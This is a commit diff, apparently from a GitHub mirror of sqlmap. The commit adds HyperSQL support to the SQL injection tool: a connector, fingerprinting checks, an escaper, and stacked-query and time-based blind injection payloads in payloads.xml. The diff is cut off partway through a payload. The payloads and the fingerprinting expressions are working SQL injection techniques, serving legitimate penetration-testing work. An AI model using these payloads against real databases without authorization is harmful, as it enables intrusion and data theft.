mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2024-11-28 20:43:49 +03:00
Merge pull request #475 from Meatballs1/hsql_clean
HSQL Payloads and Query Support
This commit is contained in:
commit
aeb83ba651
|
@ -20,6 +20,7 @@ from lib.core.settings import FIREBIRD_ALIASES
|
|||
from lib.core.settings import MAXDB_ALIASES
|
||||
from lib.core.settings import SYBASE_ALIASES
|
||||
from lib.core.settings import DB2_ALIASES
|
||||
from lib.core.settings import HSQL_ALIASES
|
||||
from lib.utils.sqlalchemy import SQLAlchemy
|
||||
|
||||
from plugins.dbms.mssqlserver import MSSQLServerMap
|
||||
|
@ -42,6 +43,8 @@ from plugins.dbms.sybase import SybaseMap
|
|||
from plugins.dbms.sybase.connector import Connector as SybaseConn
|
||||
from plugins.dbms.db2 import DB2Map
|
||||
from plugins.dbms.db2.connector import Connector as DB2Conn
|
||||
from plugins.dbms.hsql import HSQLMap
|
||||
from plugins.dbms.hsql.connector import Connector as HSQLConn
|
||||
|
||||
def setHandler():
|
||||
"""
|
||||
|
@ -60,6 +63,7 @@ def setHandler():
|
|||
(DBMS.MAXDB, MAXDB_ALIASES, MaxDBMap, MaxDBConn),
|
||||
(DBMS.SYBASE, SYBASE_ALIASES, SybaseMap, SybaseConn),
|
||||
(DBMS.DB2, DB2_ALIASES, DB2Map, DB2Conn),
|
||||
(DBMS.HSQL, HSQL_ALIASES, HSQLMap, HSQLConn),
|
||||
]
|
||||
|
||||
_ = max(_ if (Backend.getIdentifiedDbms() or "").lower() in _[1] else None for _ in items)
|
||||
|
|
|
@ -525,7 +525,7 @@ class Agent(object):
|
|||
else:
|
||||
return query
|
||||
|
||||
if Backend.isDbms(DBMS.MYSQL):
|
||||
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.HSQL):
|
||||
if fieldsExists:
|
||||
concatenatedQuery = concatenatedQuery.replace("SELECT ", "CONCAT('%s'," % kb.chars.start, 1)
|
||||
concatenatedQuery += ",'%s')" % kb.chars.stop
|
||||
|
|
|
@ -3448,7 +3448,11 @@ def decodeHexValue(value):
|
|||
retVal = retVal.decode("utf-16-le")
|
||||
except UnicodeDecodeError:
|
||||
pass
|
||||
|
||||
elif Backend.isDbms(DBMS.HSQL):
|
||||
try:
|
||||
retVal = retVal.decode("utf-16-be")
|
||||
except UnicodeDecodeError:
|
||||
pass
|
||||
if not isinstance(retVal, unicode):
|
||||
retVal = getUnicode(retVal, "utf8")
|
||||
|
||||
|
|
|
@ -20,6 +20,7 @@ from lib.core.settings import FIREBIRD_ALIASES
|
|||
from lib.core.settings import MAXDB_ALIASES
|
||||
from lib.core.settings import SYBASE_ALIASES
|
||||
from lib.core.settings import DB2_ALIASES
|
||||
from lib.core.settings import HSQL_ALIASES
|
||||
|
||||
FIREBIRD_TYPES = {
|
||||
"261": "BLOB",
|
||||
|
@ -137,6 +138,7 @@ DBMS_DICT = {
|
|||
DBMS.MAXDB: (MAXDB_ALIASES, None, None, "maxdb"),
|
||||
DBMS.SYBASE: (SYBASE_ALIASES, "python-pymssql", "http://pymssql.sourceforge.net/", "sybase"),
|
||||
DBMS.DB2: (DB2_ALIASES, "python ibm-db", "http://code.google.com/p/ibm-db/", "ibm_db_sa"),
|
||||
DBMS.HSQL: (HSQL_ALIASES, "python jaydebeapi", "https://pypi.python.org/pypi/JayDeBeApi/", "hsql"),
|
||||
}
|
||||
|
||||
FROM_DUMMY_TABLE = {
|
||||
|
@ -145,6 +147,7 @@ FROM_DUMMY_TABLE = {
|
|||
DBMS.FIREBIRD: " FROM RDB$DATABASE",
|
||||
DBMS.MAXDB: " FROM VERSIONS",
|
||||
DBMS.DB2: " FROM SYSIBM.SYSDUMMY1",
|
||||
DBMS.HSQL: " FROM INFORMATION_SCHEMA.SYSTEM_USERS"
|
||||
}
|
||||
|
||||
SQL_STATEMENTS = {
|
||||
|
@ -186,7 +189,9 @@ SQL_STATEMENTS = {
|
|||
|
||||
"SQL data execution": (
|
||||
"exec ",
|
||||
"execute ", ),
|
||||
"execute ",
|
||||
"values ",
|
||||
"call ", ),
|
||||
|
||||
"SQL transaction": (
|
||||
"start transaction ",
|
||||
|
|
|
@ -33,6 +33,7 @@ class DBMS:
|
|||
PGSQL = "PostgreSQL"
|
||||
SQLITE = "SQLite"
|
||||
SYBASE = "Sybase"
|
||||
HSQL = "HyperSQL"
|
||||
|
||||
class DBMS_DIRECTORY_NAME:
|
||||
ACCESS = "access"
|
||||
|
@ -45,6 +46,7 @@ class DBMS_DIRECTORY_NAME:
|
|||
PGSQL = "postgresql"
|
||||
SQLITE = "sqlite"
|
||||
SYBASE = "sybase"
|
||||
HSQL = "hsql"
|
||||
|
||||
class CUSTOM_LOGGING:
|
||||
PAYLOAD = 9
|
||||
|
|
|
@ -163,6 +163,7 @@ MAXDB_SYSTEM_DBS = ("SYSINFO", "DOMAIN")
|
|||
SYBASE_SYSTEM_DBS = ("master", "model", "sybsystemdb", "sybsystemprocs")
|
||||
DB2_SYSTEM_DBS = ("NULLID", "SQLJ", "SYSCAT", "SYSFUN", "SYSIBM", "SYSIBMADM", "SYSIBMINTERNAL", "SYSIBMTS",\
|
||||
"SYSPROC", "SYSPUBLIC", "SYSSTAT", "SYSTOOLS")
|
||||
HSQL_SYSTEM_DBS = ("INFORMATION_SCHEMA", "SYSTEM_LOB")
|
||||
|
||||
MSSQL_ALIASES = ("microsoft sql server", "mssqlserver", "mssql", "ms")
|
||||
MYSQL_ALIASES = ("mysql", "my")
|
||||
|
@ -174,10 +175,11 @@ FIREBIRD_ALIASES = ("firebird", "mozilla firebird", "interbase", "ibase", "fb")
|
|||
MAXDB_ALIASES = ("maxdb", "sap maxdb", "sap db")
|
||||
SYBASE_ALIASES = ("sybase", "sybase sql server")
|
||||
DB2_ALIASES = ("db2", "ibm db2", "ibmdb2")
|
||||
HSQL_ALIASES = ("hsql", "hsqldb", "hs", "hypersql")
|
||||
|
||||
DBMS_DIRECTORY_DICT = dict((getattr(DBMS, _), getattr(DBMS_DIRECTORY_NAME, _)) for _ in dir(DBMS) if not _.startswith("_"))
|
||||
|
||||
SUPPORTED_DBMS = MSSQL_ALIASES + MYSQL_ALIASES + PGSQL_ALIASES + ORACLE_ALIASES + SQLITE_ALIASES + ACCESS_ALIASES + FIREBIRD_ALIASES + MAXDB_ALIASES + SYBASE_ALIASES + DB2_ALIASES
|
||||
SUPPORTED_DBMS = MSSQL_ALIASES + MYSQL_ALIASES + PGSQL_ALIASES + ORACLE_ALIASES + SQLITE_ALIASES + ACCESS_ALIASES + FIREBIRD_ALIASES + MAXDB_ALIASES + SYBASE_ALIASES + DB2_ALIASES + HSQL_ALIASES
|
||||
SUPPORTED_OS = ("linux", "windows")
|
||||
|
||||
USER_AGENT_ALIASES = ("ua", "useragent", "user-agent")
|
||||
|
|
39
plugins/dbms/hsql/__init__.py
Normal file
39
plugins/dbms/hsql/__init__.py
Normal file
|
@ -0,0 +1,39 @@
|
|||
#!/usr/bin/env python
|
||||
|
||||
"""
|
||||
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
||||
See the file 'doc/COPYING' for copying permission
|
||||
"""
|
||||
|
||||
from lib.core.enums import DBMS
|
||||
from lib.core.settings import HSQL_SYSTEM_DBS
|
||||
from lib.core.unescaper import unescaper
|
||||
from plugins.dbms.hsql.enumeration import Enumeration
|
||||
from plugins.dbms.hsql.filesystem import Filesystem
|
||||
from plugins.dbms.hsql.fingerprint import Fingerprint
|
||||
from plugins.dbms.hsql.syntax import Syntax
|
||||
from plugins.dbms.hsql.takeover import Takeover
|
||||
from plugins.generic.misc import Miscellaneous
|
||||
|
||||
class HSQLMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):
|
||||
"""
|
||||
This class defines MySQL methods
|
||||
"""
|
||||
|
||||
def __init__(self):
|
||||
self.excludeDbsList = HSQL_SYSTEM_DBS
|
||||
self.sysUdfs = {
|
||||
# UDF name: UDF return data-type
|
||||
"sys_exec": { "return": "int" },
|
||||
"sys_eval": { "return": "string" },
|
||||
"sys_bineval": { "return": "int" }
|
||||
}
|
||||
|
||||
Syntax.__init__(self)
|
||||
Fingerprint.__init__(self)
|
||||
Enumeration.__init__(self)
|
||||
Filesystem.__init__(self)
|
||||
Miscellaneous.__init__(self)
|
||||
Takeover.__init__(self)
|
||||
|
||||
unescaper[DBMS.HSQL] = Syntax.escape
|
91
plugins/dbms/hsql/connector.py
Normal file
91
plugins/dbms/hsql/connector.py
Normal file
|
@ -0,0 +1,91 @@
|
|||
#!/usr/bin/env python
|
||||
|
||||
"""
|
||||
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
||||
See the file 'doc/COPYING' for copying permission
|
||||
"""
|
||||
|
||||
try:
|
||||
from thirdparty import jaydebeapi
|
||||
import jpype
|
||||
except ImportError, msg:
|
||||
pass
|
||||
|
||||
import logging
|
||||
|
||||
from lib.core.data import conf
|
||||
from lib.core.data import logger
|
||||
from lib.core.exception import SqlmapConnectionException
|
||||
from plugins.generic.connector import Connector as GenericConnector
|
||||
|
||||
class Connector(GenericConnector):
|
||||
"""
|
||||
Homepage: http://jpype.sourceforge.net/
|
||||
User guide: http://jpype.sourceforge.net/doc/user-guide/userguide.html
|
||||
API: http://code.google.com/p/pymysql/
|
||||
Debian package: <none>
|
||||
License: Apache License V2.0
|
||||
"""
|
||||
|
||||
def __init__(self):
|
||||
GenericConnector.__init__(self)
|
||||
|
||||
def connect(self):
|
||||
self.initConnection()
|
||||
try:
|
||||
jar = './thirdparty/hsql/hsqldb.jar'
|
||||
args='-Djava.class.path=%s' % jar
|
||||
jvm_path = jpype.getDefaultJVMPath()
|
||||
jpype.startJVM(jvm_path, args)
|
||||
except (Exception), msg: #todo fix with specific error
|
||||
raise SqlmapConnectionException(msg[0])
|
||||
try:
|
||||
driver = 'org.hsqldb.jdbc.JDBCDriver'
|
||||
connection_string = 'jdbc:hsqldb:mem:.' #'jdbc:hsqldb:hsql://%s/%s' % (self.hostname, self.db)
|
||||
self.connector = jaydebeapi.connect(driver,
|
||||
connection_string,
|
||||
str(self.user),
|
||||
str(self.password))
|
||||
except (Exception), msg: #todo what kind of error is this?!
|
||||
raise SqlmapConnectionException(msg[0])
|
||||
|
||||
self.initCursor()
|
||||
self.printConnected()
|
||||
|
||||
def fetchall(self):
|
||||
try:
|
||||
return self.cursor.fetchall()
|
||||
except (Exception), msg:
|
||||
logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1])
|
||||
return None
|
||||
|
||||
def execute(self, query):
|
||||
retVal = False
|
||||
|
||||
try:
|
||||
self.cursor.execute(query)
|
||||
retVal = True
|
||||
except (Exception), msg: #todo fix with specific error
|
||||
logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1])
|
||||
except Exception, msg: #todo fix with specific error
|
||||
raise SqlmapConnectionException(msg[1])
|
||||
|
||||
self.connector.commit()
|
||||
|
||||
return retVal
|
||||
|
||||
def select(self, query):
|
||||
retVal = None
|
||||
|
||||
upper_query = query.upper()
|
||||
|
||||
if query and not (upper_query.startswith("SELECT ") or upper_query.startswith("VALUES ")):
|
||||
query = "VALUES %s" % query
|
||||
|
||||
if query and upper_query.startswith("SELECT ") and " FROM " not in upper_query:
|
||||
query = "%s FROM (VALUES(0))" % query
|
||||
|
||||
self.cursor.execute(query)
|
||||
retVal = self.cursor.fetchall()
|
||||
|
||||
return retVal
|
33
plugins/dbms/hsql/enumeration.py
Normal file
33
plugins/dbms/hsql/enumeration.py
Normal file
|
@ -0,0 +1,33 @@
|
|||
#!/usr/bin/env python
|
||||
|
||||
"""
|
||||
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
||||
See the file 'doc/COPYING' for copying permission
|
||||
"""
|
||||
|
||||
from plugins.generic.enumeration import Enumeration as GenericEnumeration
|
||||
from lib.core.data import conf
|
||||
from lib.core.data import kb
|
||||
from lib.core.data import logger
|
||||
from lib.core.data import queries
|
||||
from lib.core.common import Backend
|
||||
from lib.core.common import unArrayizeValue
|
||||
from lib.request import inject
|
||||
from lib.parse.banner import bannerParser
|
||||
|
||||
class Enumeration(GenericEnumeration):
|
||||
def __init__(self):
|
||||
GenericEnumeration.__init__(self)
|
||||
|
||||
def getBanner(self):
|
||||
if not conf.getBanner:
|
||||
return
|
||||
|
||||
if kb.data.banner is None:
|
||||
infoMsg = "fetching banner"
|
||||
logger.info(infoMsg)
|
||||
|
||||
query = queries[Backend.getIdentifiedDbms()].banner.query
|
||||
kb.data.banner = unArrayizeValue(inject.getValue(query, safeCharEncode=True))
|
||||
|
||||
return kb.data.banner
|
21
plugins/dbms/hsql/filesystem.py
Normal file
21
plugins/dbms/hsql/filesystem.py
Normal file
|
@ -0,0 +1,21 @@
|
|||
#!/usr/bin/env python
|
||||
|
||||
"""
|
||||
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
||||
See the file 'doc/COPYING' for copying permission
|
||||
"""
|
||||
|
||||
from lib.core.exception import SqlmapUnsupportedFeatureException
|
||||
from plugins.generic.filesystem import Filesystem as GenericFilesystem
|
||||
|
||||
class Filesystem(GenericFilesystem):
|
||||
def __init__(self):
|
||||
GenericFilesystem.__init__(self)
|
||||
|
||||
def readFile(self, rFile):
|
||||
errMsg = "Not implemented in HSQL"
|
||||
raise SqlmapUnsupportedFeatureException(errMsg)
|
||||
|
||||
def writeFile(self, wFile, dFile, fileType=None, forceCheck=False):
|
||||
errMsg = "Not implemented in HSQL"
|
||||
raise SqlmapUnsupportedFeatureException(errMsg)
|
146
plugins/dbms/hsql/fingerprint.py
Normal file
146
plugins/dbms/hsql/fingerprint.py
Normal file
|
@ -0,0 +1,146 @@
|
|||
#!/usr/bin/env python
|
||||
|
||||
"""
|
||||
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
||||
See the file 'doc/COPYING' for copying permission
|
||||
"""
|
||||
|
||||
import re
|
||||
|
||||
from lib.core.common import Backend
|
||||
from lib.core.common import Format
|
||||
from lib.core.common import getUnicode
|
||||
from lib.core.common import unArrayizeValue
|
||||
from lib.core.data import conf
|
||||
from lib.core.data import kb
|
||||
from lib.core.data import logger
|
||||
from lib.core.enums import DBMS
|
||||
from lib.core.enums import OS
|
||||
from lib.core.session import setDbms
|
||||
from lib.core.settings import HSQL_ALIASES
|
||||
from lib.core.settings import UNKNOWN_DBMS_VERSION
|
||||
from lib.request import inject
|
||||
from plugins.generic.fingerprint import Fingerprint as GenericFingerprint
|
||||
|
||||
class Fingerprint(GenericFingerprint):
|
||||
def __init__(self):
|
||||
GenericFingerprint.__init__(self, DBMS.HSQL)
|
||||
|
||||
def getFingerprint(self):
|
||||
value = ""
|
||||
wsOsFp = Format.getOs("web server", kb.headersFp)
|
||||
|
||||
if wsOsFp and not hasattr(conf, "api"):
|
||||
value += "%s\n" % wsOsFp
|
||||
|
||||
if kb.data.banner:
|
||||
dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp)
|
||||
|
||||
if dbmsOsFp and not hasattr(conf, "api"):
|
||||
value += "%s\n" % dbmsOsFp
|
||||
|
||||
value += "back-end DBMS: "
|
||||
actVer = Format.getDbms()
|
||||
|
||||
if not conf.extensiveFp:
|
||||
value += actVer
|
||||
return value
|
||||
|
||||
blank = " " * 15
|
||||
value += "active fingerprint: %s" % actVer
|
||||
|
||||
if kb.bannerFp:
|
||||
banVer = kb.bannerFp["dbmsVersion"] if 'dbmsVersion' in kb.bannerFp else None
|
||||
|
||||
if re.search("-log$", kb.data.banner):
|
||||
banVer += ", logging enabled"
|
||||
|
||||
banVer = Format.getDbms([banVer] if banVer else None)
|
||||
value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)
|
||||
|
||||
htmlErrorFp = Format.getErrorParsedDBMSes()
|
||||
|
||||
if htmlErrorFp:
|
||||
value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
|
||||
|
||||
return value
|
||||
|
||||
def checkDbms(self):
|
||||
"""
|
||||
References for fingerprint:
|
||||
DATABASE_VERSION()
|
||||
version 2.2.6 added two-arg REPLACE functio REPLACE('a','a') compared to REPLACE('a','a','d')
|
||||
version 2.2.5 added SYSTIMESTAMP function
|
||||
version 2.2.3 added REGEXPR_SUBSTRING and REGEXPR_SUBSTRING_ARRAY functions
|
||||
version 2.2.0 added support for ROWNUM() function
|
||||
version 2.1.0 added MEDIAN aggregate function
|
||||
version < 2.0.1 added support for datetime ROUND and TRUNC functions
|
||||
version 2.0.0 added VALUES support
|
||||
version 1.8.0.4 Added org.hsqldb.Library function, getDatabaseFullProductVersion to return the
|
||||
full version string, including the 4th digit (e.g 1.8.0.4).
|
||||
version 1.7.2 CASE statements added and INFORMATION_SCHEMA
|
||||
|
||||
"""
|
||||
|
||||
if not conf.extensiveFp and (Backend.isDbmsWithin(HSQL_ALIASES) \
|
||||
or conf.dbms in HSQL_ALIASES) and Backend.getVersion() and \
|
||||
Backend.getVersion() != UNKNOWN_DBMS_VERSION:
|
||||
v = Backend.getVersion().replace(">", "")
|
||||
v = v.replace("=", "")
|
||||
v = v.replace(" ", "")
|
||||
|
||||
Backend.setVersion(v)
|
||||
|
||||
setDbms("%s %s" % (DBMS.HSQL, Backend.getVersion()))
|
||||
|
||||
if Backend.isVersionGreaterOrEqualThan("1.7.2"):
|
||||
kb.data.has_information_schema = True
|
||||
|
||||
self.getBanner()
|
||||
|
||||
return True
|
||||
|
||||
infoMsg = "testing %s" % DBMS.HSQL
|
||||
logger.info(infoMsg)
|
||||
|
||||
# TODO This gets mangled in UNION queries because of the dummy table
|
||||
result = inject.checkBooleanExpression("\"java.lang.Math.sqrt\"(1)=1")
|
||||
|
||||
if result:
|
||||
infoMsg = "confirming %s" % DBMS.HSQL
|
||||
logger.info(infoMsg)
|
||||
|
||||
result = inject.checkBooleanExpression("ROUNDMAGIC(PI())>=3")
|
||||
|
||||
if not result:
|
||||
warnMsg = "the back-end DBMS is not %s" % DBMS.HSQL
|
||||
logger.warn(warnMsg)
|
||||
|
||||
return False
|
||||
else:
|
||||
kb.data.has_information_schema = True
|
||||
Backend.setVersion(">= 1.7.2")
|
||||
setDbms("%s 1.7.2" % DBMS.HSQL)
|
||||
|
||||
if not conf.extensiveFp:
|
||||
return True
|
||||
|
||||
banner = self.getBanner()
|
||||
if banner:
|
||||
Backend.setVersion("= %s" % banner)
|
||||
else:
|
||||
if inject.checkBooleanExpression("(SELECT [RANDNUM] FROM (VALUES(0)))=[RANDNUM]"):
|
||||
Backend.setVersionList([">= 2.0.0", "< 2.3.0"])
|
||||
else:
|
||||
banner = unArrayizeValue(inject.getValue("\"org.hsqldb.Library.getDatabaseFullProductVersion\"()", safeCharEncode=True))
|
||||
if banner:
|
||||
Backend.setVersion("= %s" % banner)
|
||||
else:
|
||||
Backend.setVersionList([">= 1.7.2", "< 1.8.0"])
|
||||
|
||||
return True
|
||||
else:
|
||||
warnMsg = "the back-end DBMS is not %s or is < 1.7.2" % DBMS.HSQL
|
||||
logger.warn(warnMsg)
|
||||
|
||||
return False
|
26
plugins/dbms/hsql/syntax.py
Normal file
26
plugins/dbms/hsql/syntax.py
Normal file
|
@ -0,0 +1,26 @@
|
|||
#!/usr/bin/env python
|
||||
|
||||
"""
|
||||
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
||||
See the file 'doc/COPYING' for copying permission
|
||||
"""
|
||||
|
||||
import binascii
|
||||
|
||||
from lib.core.convert import utf8encode
|
||||
from plugins.generic.syntax import Syntax as GenericSyntax
|
||||
|
||||
class Syntax(GenericSyntax):
|
||||
def __init__(self):
|
||||
GenericSyntax.__init__(self)
|
||||
|
||||
@staticmethod
|
||||
def escape(expression, quote=True):
|
||||
"""
|
||||
>>> Syntax.escape("SELECT 'abcdefgh' FROM foobar")
|
||||
'SELECT CHAR(97)||CHAR(98)||CHAR(99)||CHAR(100)||CHAR(101)||CHAR(102)||CHAR(103)||CHAR(104) FROM foobar'
|
||||
"""
|
||||
def escaper(value):
|
||||
return "||".join("CHAR(%d)" % ord(value[i]) for i in xrange(len(value)))
|
||||
|
||||
return Syntax._escape(expression, quote, escaper)
|
29
plugins/dbms/hsql/takeover.py
Normal file
29
plugins/dbms/hsql/takeover.py
Normal file
|
@ -0,0 +1,29 @@
|
|||
#!/usr/bin/env python
|
||||
|
||||
"""
|
||||
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
||||
See the file 'doc/COPYING' for copying permission
|
||||
"""
|
||||
|
||||
from lib.core.exception import SqlmapUnsupportedFeatureException
|
||||
from plugins.generic.takeover import Takeover as GenericTakeover
|
||||
|
||||
class Takeover(GenericTakeover):
|
||||
def __init__(self):
|
||||
GenericTakeover.__init__(self)
|
||||
|
||||
def osCmd(self):
|
||||
errMsg = "Not implemented in HSQL"
|
||||
raise SqlmapUnsupportedFeatureException(errMsg)
|
||||
|
||||
def osShell(self):
|
||||
errMsg = "Not implemented in HSQL"
|
||||
raise SqlmapUnsupportedFeatureException(errMsg)
|
||||
|
||||
def osPwn(self):
|
||||
errMsg = "Not implemented in HSQL"
|
||||
raise SqlmapUnsupportedFeatureException(errMsg)
|
||||
|
||||
def osSmb(self):
|
||||
errMsg = "Not implemented in HSQL"
|
||||
raise SqlmapUnsupportedFeatureException(errMsg)
|
|
@ -510,7 +510,7 @@ class Databases:
|
|||
infoMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db)
|
||||
logger.info(infoMsg)
|
||||
|
||||
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
|
||||
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQL):
|
||||
query = rootQuery.inband.query % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db))
|
||||
query += condQuery
|
||||
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2):
|
||||
|
|
|
@ -159,7 +159,7 @@ class Entries:
|
|||
entries = zip(*[entries[colName] for colName in colList])
|
||||
else:
|
||||
query = rootQuery.inband.query % (colString, conf.db, tbl)
|
||||
elif Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
|
||||
elif Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQL):
|
||||
query = rootQuery.inband.query % (colString, conf.db, tbl, prioritySortColumns(colList)[0])
|
||||
else:
|
||||
query = rootQuery.inband.query % (colString, conf.db, tbl)
|
||||
|
|
293
xml/payloads.xml
293
xml/payloads.xml
|
@ -1127,7 +1127,6 @@ Formats:
|
|||
</test>
|
||||
<!-- End of stacked conditional-error blind queries tests -->
|
||||
|
||||
|
||||
<!-- Error-based tests - WHERE or HAVING clause -->
|
||||
<test>
|
||||
<title>MySQL >= 5.0 AND error-based - WHERE or HAVING clause</title>
|
||||
|
@ -1878,7 +1877,6 @@ Formats:
|
|||
-->
|
||||
<!-- End of error-based tests - GROUP BY and ORDER BY clauses -->
|
||||
|
||||
|
||||
<!-- Inline queries tests -->
|
||||
<test>
|
||||
<title>MySQL inline queries</title>
|
||||
|
@ -1996,7 +1994,6 @@ Formats:
|
|||
</test>
|
||||
<!-- End of inline queries tests -->
|
||||
|
||||
|
||||
<!-- Stacked queries tests -->
|
||||
<test>
|
||||
<title>MySQL > 5.0.11 stacked queries</title>
|
||||
|
@ -2245,6 +2242,48 @@ Formats:
|
|||
<dbms_version>>= 2.0</dbms_version>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>HSQL >= 1.7.2 Server stacked queries</title>
|
||||
<stype>4</stype>
|
||||
<level>1</level>
|
||||
<risk>0</risk>
|
||||
<clause>0</clause>
|
||||
<where>1</where>
|
||||
<vector>;CALL CASE WHEN ([INFERENCE]) THEN REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000) END</vector>
|
||||
<request>
|
||||
<payload>;CALL REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000)</payload>
|
||||
<comment>--</comment>
|
||||
</request>
|
||||
<response>
|
||||
<time>[SLEEPTIME]</time>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>HSQL</dbms>
|
||||
<dbms_version>>= 1.7.2</dbms_version>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>HSQL >= 2.0 Server stacked queries</title>
|
||||
<stype>4</stype>
|
||||
<level>1</level>
|
||||
<risk>0</risk>
|
||||
<clause>0</clause>
|
||||
<where>1</where>
|
||||
<vector>;CALL CASE WHEN ([INFERENCE]) THEN REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000) END</vector>
|
||||
<request>
|
||||
<payload>;CALL REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000)</payload>
|
||||
<comment>--</comment>
|
||||
</request>
|
||||
<response>
|
||||
<time>[SLEEPTIME]</time>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>HSQL</dbms>
|
||||
<dbms_version>>= 2.0</dbms_version>
|
||||
</details>
|
||||
</test>
|
||||
<!-- TODO: if possible, add payload for Microsoft Access and SAP MaxDB -->
|
||||
<!-- End of stacked queries tests -->
|
||||
|
||||
|
@ -2712,6 +2751,88 @@ Formats:
|
|||
<dbms>IBM DB2</dbms>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>HSQL >= 1.7.2 AND time-based blind (heavy query)</title>
|
||||
<stype>5</stype>
|
||||
<level>2</level>
|
||||
<risk>2</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<where>1</where>
|
||||
<vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000) ELSE '[RANDSTR]' END</vector>
|
||||
<request>
|
||||
<payload>AND '[RANDSTR]'=REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000)</payload>
|
||||
</request>
|
||||
<response>
|
||||
<time>[SLEEPTIME]</time>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>HSQL</dbms>
|
||||
<dbms_version>>= 1.7.2</dbms_version>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>HSQL >= 1.7.2 AND time-based blind (heavy query - comment)</title>
|
||||
<stype>5</stype>
|
||||
<level>5</level>
|
||||
<risk>2</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<where>1</where>
|
||||
<vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000) ELSE '[RANDSTR]' END</vector>
|
||||
<request>
|
||||
<payload>AND '[RANDSTR]'=REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000)</payload>
|
||||
<comment>--</comment>
|
||||
</request>
|
||||
<response>
|
||||
<time>[DELAYED]</time>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>HSQL</dbms>
|
||||
<dbms_version>>= 1.7.2</dbms_version>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>HSQL > 2.0 AND time-based blind (heavy query)</title>
|
||||
<stype>5</stype>
|
||||
<level>2</level>
|
||||
<risk>2</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<where>1</where>
|
||||
<vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END</vector>
|
||||
<request>
|
||||
<payload>AND '[RANDSTR]'=REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000)</payload>
|
||||
</request>
|
||||
<response>
|
||||
<time>[SLEEPTIME]</time>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>HSQL</dbms>
|
||||
<dbms_version>> 2.0</dbms_version>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>HSQL > 2.0 AND time-based blind (heavy query - comment)</title>
|
||||
<stype>5</stype>
|
||||
<level>5</level>
|
||||
<risk>2</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<where>1</where>
|
||||
<vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END</vector>
|
||||
<request>
|
||||
<payload>AND '[RANDSTR]'=REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000)</payload>
|
||||
<comment>--</comment>
|
||||
</request>
|
||||
<response>
|
||||
<time>[DELAYED]</time>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>HSQL</dbms>
|
||||
<dbms_version>> 2.0</dbms_version>
|
||||
</details>
|
||||
</test>
|
||||
<!-- TODO: if possible, add payload for Microsoft Access -->
|
||||
<!-- End of AND time-based blind tests -->
|
||||
|
||||
|
@ -2931,6 +3052,88 @@ Formats:
|
|||
<dbms>IBM DB2</dbms>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>HSQL >= 1.7.2 OR time-based blind (heavy query)</title>
|
||||
<stype>5</stype>
|
||||
<level>2</level>
|
||||
<risk>2</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<where>1</where>
|
||||
<vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000) ELSE '[RANDSTR]' END</vector>
|
||||
<request>
|
||||
